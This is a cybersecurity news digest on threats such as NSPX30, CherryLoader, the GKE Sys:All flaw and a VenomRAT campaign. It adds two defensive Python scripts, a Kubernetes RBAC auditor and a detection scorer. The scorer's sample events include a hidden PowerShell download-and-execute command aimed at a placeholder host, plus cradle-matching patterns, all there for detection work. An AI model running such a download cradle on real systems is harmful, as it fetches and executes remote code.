What’s going on in the cyber world today?
Blackwood, NSPX30 Implant, CherryLoader, Modular Malware, Google Kubernetes Flaw, India, Loan Apps, VenomRAT, Kremlin-Linked Hackers, HPE Cloud Email, Ukraine Hackers, Russian Space Center, MailerLite Phishing, Israel, Pelephone, Data Leak, Ecommerce Marketplace BuyGoods.com, UK, Voluntary Software Disclosure, Voluntary Healthcare Cyber Goals, Ring, Police Access, Doorbell Camera Footage, Tesla, EV Charging Stations, Cybercrime.
Listen to the full podcast
🚨 Cyber Alerts
A China-aligned threat actor, tracked as Blackwood by Slovak cybersecurity firm ESET, has been linked to adversary-in-the-middle (AitM) attacks that deliver a sophisticated implant called NSPX30. The previously undocumented APT group has been active since at least 2018. NSPX30 is a multistage implant that is planted by hijacking the update traffic of legitimate software such as Tencent QQ and WPS Office; the victims are primarily Chinese and Japanese manufacturing, trading and engineering companies. Once installed, NSPX30 lets the attackers intercept packets, which also helps hide their infrastructure, and carry out activities such as capturing screenshots, logging keystrokes and opening a reverse shell.
Arctic Wolf Labs has uncovered CherryLoader, a previously unknown Go-based malware loader disguised as the CherryTree note-taking application. The loader drops privilege-escalation tools such as PrintSpoofer and JuicyPotatoNG and uses a batch file to establish persistence. Notably, CherryLoader is modular: its operators can swap in a different exploit without recompiling the loader.
Researchers at Orca have identified a critical loophole in Google Kubernetes Engine (GKE), dubbed Sys:All, that could let anyone holding a Google account take control of vulnerable clusters; Orca estimates that about 250,000 active GKE clusters were exposed. The flaw stems from a widespread misconception about the system:authenticated group: administrators assume it covers only their own verified users, but in GKE it includes every account authenticated with Google. An external attacker who finds a cluster with permissions bound to that group can present an ordinary Google OAuth 2.0 bearer token to the API server and, depending on the bound role, move laterally, deploy cryptominers, cause denial of service or steal sensitive data, with no traceable link to the source Google account.
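The misconfiguration behind Sys:All is visible in a cluster’s RBAC bindings, so the quickest self-check is to list every binding whose subjects include the system:authenticated (or system:unauthenticated) group and ignore the stock discovery bindings Kubernetes creates by default. The script below is an added example written for this digest, not Orca’s tooling or anything from Google; it parses the JSON shape produced by `kubectl get clusterrolebindings,rolebindings -A -o json` and ranks the findings. The sample input is constructed, and the list of “expected default” bindings is the upstream Kubernetes set, so adjust it if your distribution adds its own.

```python
"""Audit Kubernetes RBAC for rights granted to system:authenticated.

Added example (not from the original digest or from Orca). Feed it the
output of:  kubectl get clusterrolebindings,rolebindings -A -o json
"""
import json
import sys

BROAD_GROUPS = {"system:authenticated", "system:unauthenticated"}

# ClusterRoleBindings upstream Kubernetes creates for system:authenticated;
# they grant discovery-level, read-only access and are expected to exist.
DEFAULT_BINDINGS = {"system:basic-user", "system:discovery", "system:public-info-viewer"}

# Roles whose binding to a broad group is an immediate takeover path.
CRITICAL_ROLES = {"cluster-admin", "admin", "edit"}


def broad_bindings(kubectl_output):
    """Return bindings that give the broad groups anything beyond the stock
    discovery roles, most dangerous first."""
    findings = []
    for item in kubectl_output.get("items", []):
        kind = item.get("kind", "")
        meta = item.get("metadata", {})
        name = meta.get("name", "")
        # `subjects` is null in the JSON when a binding has no subjects.
        groups = {s.get("name") for s in item.get("subjects") or []
                  if s.get("kind") == "Group"}
        exposed = sorted(groups & BROAD_GROUPS)
        if not exposed:
            continue
        if kind == "ClusterRoleBinding" and name in DEFAULT_BINDINGS:
            continue
        role = item.get("roleRef", {})
        cluster_wide = kind == "ClusterRoleBinding"
        if role.get("name") in CRITICAL_ROLES and cluster_wide:
            severity = "critical"   # every Google account is cluster admin
        elif role.get("name") in CRITICAL_ROLES:
            severity = "high"       # write access, but scoped to a namespace
        else:
            severity = "medium"     # custom/view roles still leak data
        findings.append({
            "binding": name,
            "kind": kind,
            "namespace": meta.get("namespace"),
            "role": f'{role.get("kind")}/{role.get("name")}',
            "groups": exposed,
            "severity": severity,
        })
    order = {"critical": 0, "high": 1, "medium": 2}
    return sorted(findings, key=lambda f: (order[f["severity"]], f["binding"]))


# Constructed sample in the shape kubectl emits (kind: List with mixed items).
SAMPLE_KUBECTL_JSON = {
    "kind": "List",
    "items": [
        {"kind": "ClusterRoleBinding",
         "metadata": {"name": "system:discovery"},
         "roleRef": {"kind": "ClusterRole", "name": "system:discovery"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"kind": "ClusterRoleBinding",
         "metadata": {"name": "everyone-admin"},
         "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"kind": "RoleBinding",
         "metadata": {"name": "dev-readers", "namespace": "dev"},
         "roleRef": {"kind": "ClusterRole", "name": "view"},
         "subjects": [{"kind": "Group", "name": "system:authenticated"}]},
        {"kind": "ClusterRoleBinding",
         "metadata": {"name": "alice-admin"},
         "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
         "subjects": [{"kind": "User", "name": "alice@example.com"}]},
    ],
}

if __name__ == "__main__":
    data = SAMPLE_KUBECTL_JSON if sys.stdin.isatty() else json.load(sys.stdin)
    for f in broad_bindings(data):
        scope = f["namespace"] or "<cluster>"
        print(f'[{f["severity"]:8}] {f["kind"]} {scope}/{f["binding"]} '
              f'-> {f["role"]} for {",".join(f["groups"])}')
```

On the sample, the default `system:discovery` binding is skipped, `everyone-admin` is reported as critical and the namespaced `dev-readers` as medium. Run it for real with `kubectl get clusterrolebindings,rolebindings -A -o json | python3 audit_rbac.py`; any hit should be removed or re-bound to a specific group of your own users.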
Hackers in India are capitalizing on the surge in demand for digital financial services by using fake loan applications to lure Android users with promises of instant credit. The malicious apps, recently analysed by researchers at Cyfirma, not only steal personal and financial information but also extort victims, demanding money and threatening to share manipulated nude images. Given India’s large user base and growing reliance on mobile financial transactions, these schemes pose a significant risk of identity theft and financial fraud to unsuspecting individuals.
Hackers continue to exploit the ubiquity of office documents in business communication to distribute malware. The AhnLab Security Intelligence Center (ASEC) has identified a recent campaign that uses a weaponized shortcut file named ‘Survey.docx.lnk’ to deliver the VenomRAT remote access trojan. The shortcut is disguised as a legitimate Word document; opening it runs a chain of PowerShell commands that download further malicious scripts and ultimately launch VenomRAT, which logs keystrokes, leaks PC information and executes whatever commands the threat actors send.
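Two signals in that chain are cheap to hunt for in endpoint telemetry: a shortcut whose name ends in a document extension followed by `.lnk`, and PowerShell spawned from Explorer (a double-clicked shortcut) with a hidden window and a download cradle. The scorer below is an added example for this digest, not ASEC’s detection logic; it runs over constructed Sysmon-style process-creation and file-creation events (the field names and the hypothetical download URL are assumptions) and flags events that cross a small score threshold.

```python
"""Score endpoint events for the document-masquerading .lnk -> PowerShell pattern.

Added example, not from the original digest or from ASEC. Event field names
(type, parent_image, image, command_line, target_filename) are assumed to
come from a Sysmon-like source.
"""
import re

DOC_EXTENSIONS = ("doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt")
# "Survey.docx.lnk": a document extension immediately followed by .lnk
DOUBLE_EXT_LNK = re.compile(r"\.(" + "|".join(DOC_EXTENSIONS) + r")\.lnk\b", re.I)
# Fragments typical of PowerShell download/launch cradles embedded in shortcuts
CRADLE = re.compile(
    r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|"
    r"invoke-expression|frombase64string|-enc(odedcommand)?\b", re.I)
HIDDEN_WINDOW = re.compile(r"-w(indowstyle)?\s+hidden", re.I)

ALERT_THRESHOLD = 3


def score_event(event):
    """Return (score, reasons) for one event; higher means more suspicious."""
    score, reasons = 0, []
    etype = event.get("type", "")
    cmd = event.get("command_line", "")
    image = event.get("image", "").lower()
    parent = event.get("parent_image", "").lower()

    if etype == "file" and DOUBLE_EXT_LNK.search(event.get("target_filename", "")):
        score += 3
        reasons.append("shortcut masquerading as a document (double extension)")
    if etype == "process":
        if DOUBLE_EXT_LNK.search(cmd):
            score += 3
            reasons.append("double-extension .lnk referenced on command line")
        if image.endswith(("powershell.exe", "pwsh.exe")):
            if parent.endswith("explorer.exe"):
                score += 1
                reasons.append("PowerShell launched from Explorer (double-click)")
            if HIDDEN_WINDOW.search(cmd):
                score += 1
                reasons.append("hidden window")
            if CRADLE.search(cmd):
                score += 2
                reasons.append("download/execute cradle")
    return score, reasons


def find_alerts(events):
    """Return the ids of events at or above ALERT_THRESHOLD, in input order."""
    return [e["id"] for e in events if score_event(e)[0] >= ALERT_THRESHOLD]


# Constructed sample telemetry; E1 and E2 mimic the campaign, E3 and E4 are benign.
SAMPLE_EVENTS = [
    {"id": "E1", "type": "file", "image": r"C:\Program Files\7-Zip\7zG.exe",
     "target_filename": r"C:\Users\alice\Downloads\Survey.docx.lnk"},
    {"id": "E2", "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell.exe -w hidden -c "IEX ((New-Object Net.WebClient)'
                     ".DownloadString('http://example.invalid/stage1.ps1'))\""},
    {"id": "E3", "type": "process", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": r'"WINWORD.EXE" /n "C:\Users\alice\Documents\Survey.docx"'},
    {"id": "E4", "type": "process", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -NoProfile -File C:\scripts\backup.ps1"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        s, why = score_event(ev)
        print(f'{ev["id"]}: score={s} {"ALERT" if s >= ALERT_THRESHOLD else ""} {why}')
```

The weights are deliberately simple: a double-extension shortcut alone is enough to alert, while PowerShell from Explorer needs either a hidden window plus a cradle or a cradle on its own to cross the line, which keeps ordinary admin scripts run from cmd.exe (E4) quiet.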
💥 Cyber Incidents
Suspected Kremlin-linked hackers from the APT29 group, also known as BlueBravo and Cozy Bear, infiltrated Hewlett Packard Enterprise’s (HPE) cloud email environment and exfiltrated mailbox data from certain segments, the company disclosed in a regulatory filing with the U.S. Securities and Exchange Commission. The intrusion, attributed to the Russian state-sponsored group, began in May 2023 and affected HPE mailboxes in its cybersecurity, go-to-market and other business functions. The disclosure follows Microsoft’s recent announcement linking the same threat actor to a breach of its corporate systems, underscoring how persistent APT29’s operations are.
Ukrainian hackers identified as the “BO Team” claim responsibility for a cyberattack on Russia’s State Research Center on Space Hydrometeorology that destroyed its database and valuable equipment, according to Ukraine’s defense intelligence directorate (GUR). The targeted organization, also known as “Planeta,” processes data from Earth observation satellites used by various Russian state entities. The hackers allege they destroyed servers and petabytes of information and paralysed supercomputers, at a cost to Russia of at least $10 million, though the claims could not be independently verified.
A vulnerability in the digital marketing platform MailerLite was exploited by an attacker in a phishing campaign that led to losses of over $600,000, according to web3 security firm Blockaid. The phishing emails mimicked legitimate messages from prominent web3 firms including CoinTelegraph, WalletConnect, Token Terminal and De.Fi. The attacker abused MailerLite’s standing permission to send email on behalf of these organizations, crafting deceptive messages that linked to wallet-draining sites, and took advantage of lingering “dangling DNS” records that still pointed at MailerLite after the organizations had closed their accounts.
Hacktivist group Anonymous Sudan claimed credit for disrupting Israel’s largest mobile operator, Pelephone, which serves about two million subscribers. The group said the attack, part of its campaign against Israeli targets, hit Pelephone’s entire digital infrastructure. Meanwhile, the Gaza Strip experienced a telecom blackout for the tenth time since the conflict began, limiting residents’ ability to communicate, as reported by the internet monitoring non-profit NetBlocks.
Cybersecurity researcher Jeremiah Fowler revealed a significant data exposure caused by a misconfigured cloud database linked to BuyGoods.com, a global ecommerce marketplace. The unprotected database, 198.3 gigabytes in total, contained over 260,000 records exposing affiliate payouts, refund transactions and personal details of customers and affiliates. The exposed data included customer selfies, identification cards, passports and unredacted credit card details, creating a privacy risk for individuals across 17 countries.
📢 Cyber News
The U.K. government is considering voluntary rules under which software vendors would disclose vulnerabilities responsibly, amid concerns over the management of legacy infrastructure. Following successful hacks affecting key organizations, stakeholders emphasized the need for government intervention to encourage timely disclosure, addressing vendors’ fears of penalties and reputational damage. Respondents suggested that the government issue guidance on software bills of materials, certifications for vendors, and regulations for meeting transparency standards to improve cyber resilience and incident management.
The Department of Health and Human Services (HHS) has released voluntary cybersecurity performance goals for the healthcare sector, split into essential and enhanced goals to strengthen cybersecurity practices. Although voluntary, the goals will inform upcoming HHS rule-making intended to push healthcare entities toward a better security posture. They address common weaknesses, including exposure to ransomware, and may be paired with both incentives and penalties for healthcare organizations, with financial programs envisioned to support implementation, according to the HHS concept paper released in December.
Amazon-owned Ring has announced it will stop letting police request doorbell camera footage through its app. The “Request for Assistance” tool, long criticized for enabling surveillance and racial profiling, will be discontinued this week. Law enforcement can still share safety information on Ring’s Neighbors app.
On the first day of the Pwn2Own Automotive 2024 contest, security researchers from the Synacktiv team hacked a Tesla Modem, earning $100,000 by chaining three zero-day bugs to gain root privileges. They also used two distinct two-bug chains to compromise a Ubiquiti Connect EV Station and a JuiceBox 40 Smart EV Charging Station, earning a further $120,000, and a third exploit chain against the ChargePoint Home Flex EV charger earned $16,000. In all, they collected $295,000 in prizes on the first day. The competition focuses on automotive technologies, allowing researchers to target Tesla in-vehicle infotainment systems, EV chargers and car operating systems, with cash prizes and even a Tesla car on offer for the top exploits.
The cost of cybercrime is projected to reach $12 trillion by 2025, surpassing previous estimates, according to the Computer Crime Research Center (CCRC). While Cybersecurity Ventures estimated next year’s global cost at $10.5 trillion, the CCRC, citing research by Check Point and Orange Cyberdefense, anticipates continued growth in cyberattacks and ransomware. The CCRC is concerned that the threat landscape is being fuelled by artificial intelligence and predicts attackers will increasingly adopt AI for more sophisticated and targeted offensives in the coming years.